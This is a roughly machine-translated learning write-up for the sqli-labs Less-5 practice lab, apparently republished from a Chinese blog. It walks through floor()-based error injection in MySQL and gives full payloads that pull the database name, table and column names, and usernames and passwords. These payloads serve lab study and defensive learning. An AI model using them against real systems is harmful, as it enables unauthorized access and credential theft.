White injection Learning: sqli-labs - less5 learning record

Others 2020-03-28 05:02:05 views: null

Character Less5 double injection: floor () function is given injection

1 determines whether the type of injection and the injection point
? (1) id = 1 'displays an error page, the database being given
id = 1?' And 1 =normal page display
? Id = 1 'and 1 =+ page displays an error
(2) after these basic tests to determine the presence of the injection point here before but the difference is, Less5 only shows You are in ... and without displaying the error message other information, can not be significantly wrong type filler.
(3) Since the error page displays information database, where the formula may be given by injection. Here I use floor () function error injection.
2. Get the database name

?id=-1' union select 1,count(*),concat_ws('~',(select database()),floor(rand(0)*2))as a from information_schema.tables group by a--+

dbname


3. Get table name

?id=-1' union select 1,count(*),concat_ws('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a--+

tbname


4. Get Listed

?id=-1' union select 1,count(*),concat_ws('~',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand(0)*2)) as a from information_schema.tables group by a--+

columns


5. Obtain field contents

?id=-1' union select 1,count(*),concat_ws('~',(select concat_ws(':',username,password)from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a--+

PWD


PS: white summary

(1) floor analysis (accompanied by an explanation of the fine blog) error principle
https://www.cnblogs.com/litlife/p/8472323.html
(2) CONCAT_WS () function is CONCAT () special form. The first parameter is the other argument separator. Positions separator placed between two strings to be connected. The separator can be a string or other parameters.
(3) Since the error indicator only allowing single line, often keep limit () function, a query data after a query
limit (m, n) represents the m + 1 n data fetch start
limit 1,1 expressed from a data fetch two data starts, limit n represents the start of reading the n data from the 0-th data.
(4) Less5 mainly given in accordance with their selected error injection page. floor () error injection, twice the payload in a select query, the query is a double injection.

 

White inject learning record! !

 

Guess you like

Origin www.cnblogs.com/ersuani/p/sqlilab_less5.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com